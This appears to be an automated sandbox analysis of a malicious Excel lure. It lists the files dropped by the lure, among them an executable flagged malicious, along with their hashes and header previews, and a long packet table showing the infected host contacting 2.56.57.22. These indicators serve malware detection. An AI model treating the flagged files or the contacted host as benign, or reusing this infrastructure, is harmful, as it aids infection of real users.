Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L,/B-B\|B-B\|B-B\|..\|G-B\|..\|k-B\|..\|.-B\|..\|.-B\|B-C\|(-B\|.Z.\|G-B\|B-B\|A-B\|a.\|.-B\|$.\|C-B\|$.\|C-B\|RichB-B\|................PE..L......V.........."!.....J...........o.......`...............................p............@......................... ...=... ..<.......................X3...0..P0..Pk..8...........................x...@............"..P............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data...@....`.......L..............@....idata....... .......h..............@....reloc...9...0...:...x..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\folder-publicshare.png

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PNG image data, 16 x 16, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	585
Entropy (8bit):	6.901794968845596
Encrypted:	false
SSDEEP:	12:6v/7X0Z7HBwN1+swFIzRqwnN14BZlEcFCF2BoCaTxT4:C0BqEWqQ8YGCgBoCaT14
MD5:	1D98E1B2D84D7B9D0927F6B651EDE827
SHA1:	A1F77FF7EC77865AEF6A4C1B64CC4E3C492090A5
SHA-256:	A9109F45EFD9920700AAF489167AE647FB0BF88CE12AAF69502AD6D1505CB7B3
SHA-512:	A13756009BC37481EBA3B8523EC0458A43459E34F8A81CFC924E20F9B7A68936DF4B321376B5C4DFE464E5AE403876EBB3CE96EE394C7BF1B46094CE9BC2E958
Malicious:	false
Preview:	.PNG........IHDR.............(-.S....sBIT.....O.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Folder Icons.._.....tEXtAuthor.Lapo Calamandrei..*...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb....~PLTE.........................................~...............................................................................l.....tRNS.@NS.................{IDAT.WU....0..#....9..!B...Aj)..Sv.,.....`....q..h..w..g..u.4X.x~...#S..d)...D..-W.[A4.ea...nf./.....`..\|...W.}.e<.:\......~..%....IEND.B`.

C:\Users\user\AppData\Local\Temp\krista.ini

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.853055907333276
Encrypted:	false
SSDEEP:	3:rqh2mJUKMJjwD:raJ8JjI
MD5:	6EA2EDF492D8337635DDCD02048BFA32
SHA1:	3F86F5C6398972128ABD8822B5BD1BFE446C6517
SHA-256:	35E1C059B4E54107456E898FBED2CFA59289F9272495014B4396C8ED427EBC95
SHA-512:	56EC3DBDA7B837E26520F90E4D336FDB95D0789BE8A15E034526ED4553683E93F9C116FC57BCAC2C37DAEA516AFAC48CEE39F5BA6363415A4DA68806E1F6BAF9
Malicious:	false
Preview:	[ARBEJDSKLIMA]..Sporangia57=SPOTTEFUGL..

C:\Users\user\AppData\Local\Temp\lang-1045.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	174600
Entropy (8bit):	3.9275478025543364
Encrypted:	false
SSDEEP:	1536:lkoZp1DEqOBdglkr6myEGXRC5bWgiViQFpETgevYNBVe/d:qoZHq+4UXRC5b0ViQFpNQd
MD5:	E10F0042C0EE3B2DE59BEC61D3811C6A
SHA1:	0F75AEEE0338D2E563FD146847E21187C68FD75F
SHA-256:	20DA8A600117A2ACC6A66AD493390D1DA3F8A9CC7FF13A8185EC02A0E5C93B2B
SHA-512:	BA174D089A52135E9CEE8704749D9C44C4EC361C34E09C26CCFB4A34EB69590FCA77250E17B1ED68506B4C0EC958A2B17DED25741177D77CA68D05CDB1ED2FBC
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!......................................................................@.......................................... ..h................ ...........................................................................................rdata..p...........................@..@.rsrc...h.... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...d...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\multimedia-volume-control-symbolic.symbolic.png

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	225
Entropy (8bit):	6.661593260259915
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllE+UwHndZxx3hYB84wXKYAIk9d0LPoBHlNHbEezI:6v/lhPysHUunYBcXKYA59dPFxRbZofp
MD5:	E91514290CFC6F38580278374D3C6B0F
SHA1:	068CB1200349717E8D2EE64475F480C850A85099
SHA-256:	0DE516FC5D5A233BC240F055C70B004160CE4FA2364C93CC12D7D1A60C23420D
SHA-512:	A6C1523D984857924FDDEFD48741B6FB552CAC220D53619F3E572799DACC0EE06B1FBF75D9CDC127BB685BADB4933FFD4F4923E341492307C55BE4C196510C57
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...?..A...O...V..D.t...8..Y.n....V.$......../..e...of.g.pm..pF(..,..Oq8.xb........~....$.]......y..".(..7.-.._....0...eUS.c..Y....}.J..p...M.....q=.=.B`....IEND.B`.

C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	243209
Entropy (8bit):	5.969458574226536
Encrypted:	false
SSDEEP:	6144:RPVByzfb1YfMq48FKMqCQQU7k1TAH1OobTrEPvQvHk8hep:RPKqUjHM/PvQvHk8hep
MD5:	2510EF915FD96CB0C5D947BA98CB751D
SHA1:	AE10088DD6EC5BD0607FD5848A746AE57DCDC20E
SHA-256:	02528C6E3F317B8FA9010BED22383D9BF696CC3DC9B97CC7FF81A445BE470FA1
SHA-512:	ACA3ED02461EB0D70EF7BF5A74F1E9C7D20446349A02485A49BE3530F9C7CCEEE8F74A412FA8FD9002A815762F240C3C89AEACC97FF84130BE428F8C9ED73E05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P.........C..............................0............`... .........................................V....................p..p............ ...............................T..(...................8................................text...............................`..`.data........ ......................@....rdata..`9...0...:..................@..@.pdata..p....p.......N..............@..@.xdata..\............f..............@..@.bss....P................................edata..V............~..............@..@.idata..............................@....CRT....X...........................@....tls................................@....reloc....... ......................@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF483FEDB67C914879.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	884736
Entropy (8bit):	5.929365373182359
Encrypted:	false
SSDEEP:	12288:H8FSe/L5ZcP0pYqezVZ6NVrjlSf0nMhdt2nbJR3xAN/lgP4OhE:H6SWa0pzexZ6frjlYKS2dJm/yN
MD5:	71C5C71EC5A5FDD6B95C5CD618B2D7A2
SHA1:	10B619F785447D9C289F455BB96CC78FB5E10113
SHA-256:	5E5C4C2716ED5B8E1C661E8D26A73156F1E24B54A78900E370F2BD90A9BF66FF
SHA-512:	CAE965EFB9F1A4FAF3EE5DE87C47EAA7A65D08C6B08D64D97F3716DD8005D3B12950EE05317670C7084B8DF8E0C912CC67842ABD62441EC407CB4F378D787C3C
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\venxajlddf.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1449584
Entropy (8bit):	7.9198763448081495
Encrypted:	false
SSDEEP:	24576:KY9Mbnf2VYqw1ubzB3Gk+VQOIT/DrboejxAseAb7pexIlu7T6SW4gjs2H:39Mbnf5+PwkEs/ToejptpeilqT6SL4
MD5:	2A384E15F8133C8B9ECEFA4DA1D96CEE
SHA1:	346475908F4F76A3C76D7E6D60E58DEBAB862DAA
SHA-256:	401BAE096C7E9DF1B24BF3A34E4A711A2C955700A8B719972B45BDFD10DDEBD2
SHA-512:	73E97BCB16362476259FC154E293EC2B0DAA9FF011902D406330EB3AF7352C9DEC6CBF4709C6C09BA7A0FC18E5FECC8F90D07C64A9F96B7ED071F12ECFCD4A30
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................[.....@.............................................h-..........P... ............................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...h-..........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.998091982797452
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls
File size:	750902
MD5:	3fed4357a9a31f6d784d90e0e2828cef
SHA1:	b10fe00a3142c331aa805a78b5e01e9fa73d9c6b
SHA256:	bc03e79179795e31ba88934475f0746f25a7382a157ab005a54cae03b83c797d
SHA512:	4442b981e4797c3d25c536b92a765f72a38147ec2741a638c6d54226375f60bc30526a4cf1bd26c8e047afbb1c08a57aa86f4341e4508abc06980c3440297c43
SSDEEP:	12288:UML7nvXmvi+sc3vTA2Q3J1XyQEAHd/vcjtCbQ0kMYO2eFUOoV35YqT00hXTrS2i1:JmviHc37AXJwQNc2RKbsd0hnS2Aaqvn
TLSH:	20F423B957FBC328D35E472592207FB81CBCF1114E133E768D22769D86228A6CE5E11E
File Content Preview:	PK........Z..T..Uj....3.......[Content_Types].xmlUT..../.b./.b./.b.TMO.@.........i9 ..8...H....m.q.....)..z<i.......I.~........b..M...V.Q.o.6~Z.?....Q )....j....W'?F...X0.c-fD.RJlf..V!.gK..S..i.j.j..l08.M...J...j4.V.Y~..z.I.SQ....T-...\|/."..[..2[.c.X..R

File Icon


Icon Hash:	e4eea286a4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2022 12:02:27.140098095 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.167320967 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.167413950 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.168530941 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198072910 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198128939 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198162079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198191881 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198223114 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198234081 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198241949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198255062 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198266983 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198278904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198285103 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198302031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198312998 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198326111 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198328972 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198349953 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.198357105 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.198383093 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225797892 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225845098 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225868940 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225892067 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225897074 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225912094 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225922108 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225927114 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225948095 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225951910 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225972891 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.225980043 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.225999117 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226005077 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226023912 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226030111 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226048946 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226054907 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226073980 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226080894 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226100922 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226105928 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226125956 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226131916 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226150036 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226159096 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226176023 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226181030 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226201057 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226207972 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226226091 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226232052 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226252079 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226257086 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226275921 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226283073 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226300955 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.226305962 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.226331949 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.232940912 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253705978 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253740072 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253766060 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253778934 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253791094 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253803015 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253807068 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253824949 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253833055 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253849983 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253869057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253876925 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253882885 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253897905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253906012 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253923893 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253927946 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253948927 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253956079 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253971100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253978968 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.253994942 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.253994942 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254019976 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254028082 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254045010 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254050016 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254072905 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254080057 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254096031 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254102945 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254121065 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254126072 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254144907 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254153013 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254175901 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254183054 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254200935 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254206896 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254225016 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254230022 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254250050 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254260063 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254276037 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254277945 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254298925 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254307032 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254323006 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.254329920 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.254354954 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.255711079 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.259917974 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.259951115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.259975910 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.259995937 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260001898 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260016918 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260026932 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260034084 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260051012 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260057926 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260076046 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260082006 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260099888 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260107040 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260123968 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260130882 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260149002 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260154963 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260174036 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260179043 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260200024 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260210037 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260226011 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260232925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260251045 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260257959 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260277033 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.260282993 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.260308981 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.262043953 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.281821966 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.281862020 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.281892061 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.281908035 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.281913996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.281935930 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.281954050 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.281971931 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.281986952 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282007933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282030106 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282052994 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282052994 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282063007 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282078028 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282082081 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282104015 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282110929 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282126904 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282129049 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282151937 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282160044 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282176018 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282177925 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282200098 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282208920 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282226086 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282227039 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282249928 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282257080 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282290936 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282486916 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282510996 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282527924 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282533884 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282543898 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282557011 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282562017 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282579899 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282588959 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282604933 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282610893 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282632113 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282636881 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282658100 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282663107 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282680988 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282690048 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282704115 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282710075 CEST	49171	80	192.168.2.22	2.56.57.22
May 27, 2022 12:02:27.282728910 CEST	80	49171	2.56.57.22	192.168.2.22
May 27, 2022 12:02:27.282735109 CEST	49171	80	192.168.2.22	2.56.57.22
